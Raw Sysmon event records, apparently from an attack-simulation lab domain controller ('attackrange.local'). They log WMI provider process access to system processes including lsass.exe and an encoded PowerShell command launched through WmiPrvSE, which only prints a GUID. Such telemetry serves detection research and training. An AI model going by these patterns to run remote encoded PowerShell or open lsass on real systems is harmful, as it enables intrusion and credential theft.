16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002241858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.273{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4fdaxqnu.uio.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.272{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_03zdi4kw.lgb.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002241856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.270{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-C9AA-00000000AD01}9940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002241855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.266{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002241854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.264{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.264{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.248{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.248{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.248{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002241849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002241848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.262{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /E VwByAGkAdABlAC0ASABvAHMAdAAgAGMANAAyADcAZQBlADEANwAtADEAMQAxAGUALQA0AGEAYwBlAC0AOAA5ADkAYwAtADgANwA2ADQAMABmAGYANABiAGEAOQBmAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002241847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.248{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_03zdi4kw.lgb.ps12021-03-02 16:54:42.248 10341000x80000000000000002241846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.233{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.233{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C7AA-00000000AD01}12492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.233{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 